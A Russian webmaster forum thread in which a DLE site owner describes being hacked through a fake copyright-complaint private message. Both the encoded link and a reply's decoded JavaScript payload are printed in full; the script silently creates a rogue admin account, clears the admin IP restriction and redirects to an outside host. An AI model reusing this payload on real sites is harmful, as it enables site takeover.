Взламывают DLE сайты, осторожно

Взламывают DLE сайты, осторожно

Опции

MacLeo

Topic Starter сообщение

26.7.2017, 18:22; Ответить: MacLeo

Сообщение #1

тИЦ`анутый

Группа: Active User
Сообщений: 1126
Регистрация: 1.6.2010
Поблагодарили: 320 раз
Репутация:

49

Привет владельцы DLE-сайтов. Сегодня столкнулся с такой вот неприятной ситуацией. Захожу на сайт и вижу что мне на профиль админа пришло новое сообщение, захочу читать и вижу:

Все бы ничего, но я взял да и кликнул по этой ссылке. Спрашивается, зачем?
Ну, кликнул и кликнул. Смотрю, долго что то идет загрузка и тут меня осенило, надо ж было с инкогнито заходить :facepalm:

Открываю сайт и вижу что он как бы "закрыт на тех.работы", заглушка висит. Я сразу в админку, открыл, смотрю в Редактировании пользователей появился новый админ. Понятное дело что сразу удалил, но осадок остался.
Ссылка из полученного ЛС:

Развернуть/Свернуть

Код

/engine/go.php?url=Ij48L2E%2BDQoKPGNvZGUgc3R5bGU9J2Rpc3BsYXk6IG5vbmU7JyBpZD0nTEpLd3FvaURIcWV3RSc%2BPC9jb2RlPg0KPHNjcmlwdD4NCmZ1bmN0aW9uIEEoKXsNCnZhciBxOw0KdHJ5e3E9bmV3IEFjdGl2ZV
hPYmplY3QoIk1zeG1sMi5YTUxIVFRQIik7fWNhdGNoKGUpe3RyeXtxID0gbmV3IEFjdGl2ZVhPYmplY3Q
oIk1pY3Jvc29mdC5YTUxIVFRQIik7fWNhdGNoIChFKXsNCnEgPSBmYWxzZTt9fWlmKCFxICYmIHR5cGVv
ZiBYTUxIdHRwUmVxdWVzdCE9J3VuZGVmaW5lZCcpe3EgPSBuZXcgWE1MSHR0cFJlcXVlc3QoKTt9cmV0d
XJuIHE7DQp9DQp2YXIgcnA9Ii8iOw0KdmFyIHVsPSJzaXRuaWtvdmF2c3ciOw0KdmFyIHVwPSJkMTQ3OD
k2M0QiOw0KdmFyIHVtPSJzaXRuaWtvdmF2c3cxOTg4QG1haWwucnUiOw0KdmFyIG9iamh0dHA9QSgpOw0
Kb2JqaHR0cC5vbnJlYWR5c3RhdGVjaGFuZ2UgPSBmdW5jdGlvbigpIA0Kew0KCWlmIChvYmpodHRwLnJl
YWR5U3RhdGUgPT0gNCkgDQoJew0KCQl2YXIgcj1uZXcgUmVnRXhwKGF0b2IoJ1pHeGxYMkZrYldsdVhIT
XFQVnh6S2lnbmZDSXBLQzRyUHlrb0ozd2lLUT09JykpOw0KCQl2YXIgZGE9ci5leGVjKG9iamh0dHAucm
VzcG9uc2VUZXh0KVsyXTsNCgkJcj1uZXcgUmVnRXhwKGF0b2IoJ1pHeGxYMnh2WjJsdVgyaGhjMmhjY3l
vOVhITXFLQ2Q4SWlrb0xpcy9LU2duZkNJcCcpKTsNCgkJdmFyIGRoPXIuZXhlYyhvYmpodHRwLnJlc3Bv
bnNlVGV4dClbMl07DQoJCW9iamh0dHAub3BlbigiUE9TVCIscnArZGErJz9tb2Q9ZWRpdHVzZXJzJmFjd
Glvbj1saXN0Jyx0cnVlKTsNCgkJb2JqaHR0cC5zZXRSZXF1ZXN0SGVhZGVyKCdDb250ZW50LVR5cGUnLC
dhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQnKTsNCgkJb2JqaHR0cC5zZW5kKCdhY3Rpb24
9YWRkdXNlciZ1c2VyX2hhc2g9JytkaCsnJm1vZD1lZGl0dXNlcnMmcmVndXNlcm5hbWU9Jyt1bCsnJnJl
Z3Bhc3N3b3JkPScrdXArJyZyZWdlbWFpbD0nK3VtKycmcmVnbGV2ZWw9MScpOw0KCQl2YXIgb2JqaHR0c
DI9QSgpOw0KCQlvYmpodHRwMi5vbnJlYWR5c3RhdGVjaGFuZ2U9ZnVuY3Rpb24oKQ0KCQl7DQoJCQlpZi
hvYmpodHRwMi5yZWFkeVN0YXRlPT00KQ0KCQkJew0KCQkJCXZhciBzZD1kb2N1bWVudC5nZXRFbGVtZW5
0QnlJZCgnTEpLd3FvaURIcWV3RScpOw0KCQkJCXNkLmlubmVySFRNTD1vYmpodHRwMi5yZXNwb25zZVRl
eHQucmVwbGFjZSgvKDxzY3JpcHQpL2ksJycpOw0KCQkJCXZhciBhZWw9c2QuZ2V0RWxlbWVudHNCeVRhZ
05hbWUoJyonKTsNCgkJCQl2YXIgcGQ9Jyc7DQoJCQkJcj1uZXcgUmVnRXhwKGF0b2IoJ1hpaHpZWFpsWD
JOdmJpaz0nKSk7DQoJCQkJZm9yKHZhciBpPTA7aTxhZWwubGVuZ3RoO2krKykNCgkJCQkJaWYoci50ZXN
0KGFlbFtpXS5uYW1lKSkNCgkJCQkJCXBkPXBkK2FlbFtpXS5uYW1lKyc9JytlbmNvZGVVUklDb21wb25l
bnQoYWVsW2ldLnZhbHVlKSsnJic7DQoJCQkJcGQ9cGQrJ3NhdmVfY29uW2FkbWluX2FsbG93ZWRfaXBdP
SZtb2Q9b3B0aW9ucyZhY3Rpb249ZG9zYXZlc3lzY29uJnVzZXJfaGFzaD0nK2RoOw0KCQkJCXZhciBvYm
podHRwMz1BKCk7DQoJCQkJb2JqaHR0cDMub3BlbignUE9TVCcscnArZGErJz9tb2Q9b3B0aW9ucyZhY3R
pb249c3lzY29uJyx0cnVlKTsNCgkJCQlvYmpodHRwMy5zZXRSZXF1ZXN0SGVhZGVyKCdDb250ZW50LVR5
cGUnLCdhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQnKTsNCgkJCQlvYmpodHRwMy5zZW5kK
HBkKTsNCgkJCQl3aW5kb3cubG9jYXRpb24uaHJlZiA9ICJodHRwOi8veWFuZGV4LW1ldHJpY2EucnUveU
1LVEZmIjsNCgkJCX0NCgkJfQ0KCQlvYmpodHRwMi5vcGVuKCdHRVQnLHJwK2RhKyc%2FbW9kPW9wdGlvbnMmYWN0aW9uPXN5c2NvbicsdHJ1ZSk7DQoJCW9iamh0dHAyLnNlbmQobnVsbCk7DQ
oJfQ0KDQp9DQpvYmpodHRwLm9wZW4oJ0dFVCcsIHJwLCB0cnVlKTsNCm9iamh0dHAuc2VuZChudWxsKTs
NCjwvc2NyaXB0PjxhIGhyZWY9Imh0dHA6Ly95YW5kZXgtbWV0cmljYS5ydS95TUtURmY%3D

Расшифровать её у меня не вышло, но она добавила мне админа лишнего, вот так вот.

Если у кого то получится расшифровать или кто то знает подробности по этому поводу - пишите в ЛС либо тут в теме, буду благодарен и, возможно, не только я.

Ну и для ПС, пожалуй оставлю текст сообщения непосредственно текстом, а не картинкой:
Жалоба на материал размещенный на вашем сайте

Здравствуйте! Уважаемая администрация,
Материалы, принадлежащие нашему клиенту, размещены на Вашем сайте. Клиент разрешения на их публикацию не давал. Существуют основания для запрета клиентом к распространению в сети данных файлов, а также основания, в случае отказа удаления, признания соответствующих действий компрометирующими. Просим удалить материалы в течение 3-х рабочих дней со дня получения данного письма. Данное письмо просим считать официальным электронным уведомлением*, которое является зарегистрированным в соответствующей электронной базе t&p, заверено электронной подписью и может быть использовано t&p в качестве аргумента в случае возникновения дополнительных разбирательств.

Ссылка на материал
_________
*зафиксирован t&p как официальное средство уведомления состоянием на 5 июня 2017 года

С уважением, Екатерина Стрельцова
Ведущий специалист t&p
tokarevpartners.ru
Regards, Kate Stleltzova

Поблагодарили: (2)

eduarddis, Zoya83

2

Ответить с цитированием данного сообщения

kagtus kagtus 27.7.2017, 11:45; Сообщений: 421 Поблагодарили: 95 раз Репутация: 22 Просмотр профиля	27.7.2017, 11:45; Ответить: kagtus Сообщение #2
Бывалый Группа: User Сообщений: 421 Регистрация: 11.10.2012 Из: Kostroma Поблагодарили: 95 раз Репутация: 22	результат Цитата "></a> <code style='display: none;' id='LJKwqoiDHqewE'></code> <script> function A(){ var q; try{q=new ActiveXObject("Msxml2.XMLHTTP");}catch(e){try{q = new ActiveXObject("Microsoft.XMLHTTP");}catch (E){ q = false;}}if(!q && typeof XMLHttpRequest!='undefined'){q = new XMLHttpRequest();}return q; } var rp="/"; var ul="sitnikovavsw"; var up="d1478963D"; var um="sitnikovavsw1988@mail.УБРАТЬru"; var objhttp=A(); objhttp.onreadystatechange = function() { if (objhttp.readyState == 4) { var r=new RegExp(atob('ZGxlX2FkbWluXHMqPVxzKignfCIpKC4rPykoJ3wiKQ==')); var da=r.exec(objhttp.responseText)[2]; r=new RegExp(atob('ZGxlX2xvZ2luX2hhc2hccyo9XHMqKCd8IikoLis/KSgnfCIp')); var dh=r.exec(objhttp.responseText)[2]; objhttp.open("POST",rp+da+'?mod=editusers&action=list',true); objhttp.setRequestHeader('Content-Type','application/x-www-form-urlencoded'); objhttp.send('action=adduser&user_hash='+dh+'&mod=editusers&regusername='+ul+'&regpassword='+up+'&regemail='+um+'&reglevel=1'); var objhttp2=A(); objhttp2.onreadystatechange=function() { if(objhttp2.readyState==4) { var sd=document.getElementById('LJKwqoiDHqewE'); sd.innerHTML=objhttp2.responseText.replace(/(<script)/i,''); var ael=sd.getElementsByTagName(''); var pd=''; r=new RegExp(atob('XihzYXZlX2Nvbik=')); for(var i=0;i<ael.length;i++) if(r.test(ael[i].name)) pd=pd+ael[i].name+'='+encodeURIComponent(ael[i].value)+'&'; pd=pd+'save_con[admin_allowed_ip]=&mod=options&action=dosavesyscon&user_hash='+dh; var objhttp3=A(); objhttp3.open('POST',rp+da+'?mod=options&action=syscon',true); objhttp3.setRequestHeader('Content-Type','application/x-www-form-urlencoded'); objhttp3.send(pd); window.location.href = "http://yandex-metrica.УБРАТЬru/yMKTFf"; } } objhttp2.open('GET',rp+da+'?mod=options&action=syscon',true); objhttp2.send(null); } } objhttp.open('GET', rp, true); objhttp.send(null); </script><a href="http://yandex-metrica.УБРАТЬru/yMKTFf кто хочет поспамить товарищу ситникову?? Сообщение отредактировал kagtus* - 27.7.2017, 11:48 -------------------- ася 45два48499два удалю вирусы, помогу с сайтом ->отзывы ТУТ и ТАМ

GlazAlmaz GlazAlmaz 27.7.2017, 11:48; Сообщений: 3549 Поблагодарили: 1792 раза Репутация: 111 Просмотр профиля	27.7.2017, 11:48; Ответить: GlazAlmaz Сообщение #3
Главный SEO-стратег Группа: Super Moderator Сообщений: 3549 Регистрация: 28.8.2010 Поблагодарили: 1792 раза Репутация: 111	Цитата(kagtus @ 27.7.2017, 11:45) sitnikovavsw1988@mail.ru вот и email врага расшифровали -------------------- :: научу, как продвигать сайты :: SEO-шмео, все дела :)

Zoya83 Zoya83 27.7.2017, 12:43; Сообщений: 3118 Поблагодарили: 3492 раза Репутация: 549 Просмотр профиля	27.7.2017, 12:43; Ответить: Zoya83 Сообщение #4
Я творю тебя, жизнь... Группа: Active User Сообщений: 3118 Регистрация: 28.4.2010 Из: Краснодар Поблагодарили: 3492 раза Репутация: 549	Ну вот как так-то.... Делаешь, делаешь, время, нервы, деньги вкладываешь... Зла не хватает. Никакой стабильности и никакого спокойствия в сети... Сообщение отредактировал Zoya83 - 27.7.2017, 12:43 -------------------- Я в Инстаграме, WhatsApp +79615372893

Virus_07 Virus_07 27.7.2017, 12:55; Сообщений: 1483 Поблагодарили: 572 раза Репутация: 82 Просмотр профиля	27.7.2017, 12:55; Ответить: Virus_07 Сообщение #5
Онлайн Группа: Active User Сообщений: 1483 Регистрация: 26.4.2010 Из: Наночастиц Поблагодарили: 572 раза Репутация: 82	Если честно, то очень гениально придумано. Прям классно даже. До Взлома - тут как до китая раком. А Вот невнимательность Админа - да. Цитата(Zoya83 @ 27.7.2017, 11:43) Никакой стабильности и никакого спокойствия в сети. Зой, какая может быть стабильность в сети)) Завтра Яндекс или Гугл выкатят какой-то новый фильтр и все медным тазом накрыться может. Или наша Госдума придумает какой-то закон и тоже самое все медным тазом накроется. Сеть - такое место, где от нас мало чего зависит.

MacLeo Topic Starter MacLeoTopic Starter 27.7.2017, 17:46; Сообщений: 1126 Поблагодарили: 320 раз Репутация: 49 Просмотр профиля	Topic Starter 27.7.2017, 17:46; Ответить: MacLeo Сообщение #6
тИЦ`анутый Группа: Active User Сообщений: 1126 Регистрация: 1.6.2010 Поблагодарили: 320 раз Репутация: 49	Цитата(Virus_07 @ 27.7.2017, 9:55) До Взлома - тут как до китая раком. А Вот невнимательность Админа - да. Это согласен, но все равно это дыра в DLE, что так легко, одной ссылкой можно взять и добавить юзера с правами админа. Разве нет?

Virus_07 Virus_07 27.7.2017, 21:15; Сообщений: 1483 Поблагодарили: 572 раза Репутация: 82 Просмотр профиля	27.7.2017, 21:15; Ответить: Virus_07 Сообщение #7
Онлайн Группа: Active User Сообщений: 1483 Регистрация: 26.4.2010 Из: Наночастиц Поблагодарили: 572 раза Репутация: 82	Цитата(MacLeo @ 27.7.2017, 16:46) но все равно это дыра в DLE Я бы не сказал, что дыра. Скорее Фича. У хакера нет прав админа. По сути вы сами ему создаете аккаунт админа. А что касается ссылки, так это же интернет, тут любую команду можно выполнить через адресную строку.

LisER

30.7.2017, 0:00; Ответить: LisER

Сообщение #8

Новичок

Группа: Viewer
Сообщений: 6
Регистрация: 18.10.2015
Поблагодарили: 0 раз
Репутация:

0

это дыра была на ДЛЕ до 11,3 ) не давно группа разработчиков дле на своем офф сайте написали что это проблема была на всех версиях до 11,3 ) и там же было как решит эту проблему )

Замечание модератора:
Эта тема была закрыта автоматически ввиду отсутствия активности в ней на протяжении 100+ дней.
Если Вы считаете ее актуальной и хотите оставить сообщение, то воспользуйтесь кнопкой

или обратитесь к любому из модераторов.

« Предыдущая тема · Программная часть · Следующая тема »

2 чел. читают эту тему (гостей: 2, скрытых пользователей: 0)

Пользователей: 0

Похожие темы

Тема	Ответов	Автор	Просмотров	Последний ответ
Сайты уходят в прошлое для развития бизнеса стали не столь актуальны	154	muratastana	30433	16.4.2024, 22:40 автор: malamut
Продам свои сайты 10 сайтов на продажу	3	ArchiDOM	1443	5.4.2024, 3:51 автор: Llirik
Есть смысл создавать сайты на латышском?	16	Nekit	3907	31.3.2024, 1:23 автор: Liudmila
Сайты с доходом на продажу. Будет ли спрос?	46	Telnor	45034	30.3.2024, 15:37 автор: trustedadvisor
Куплю хорошие сайты	7	Boymaster	2431	25.3.2024, 12:50 автор: Wilkinson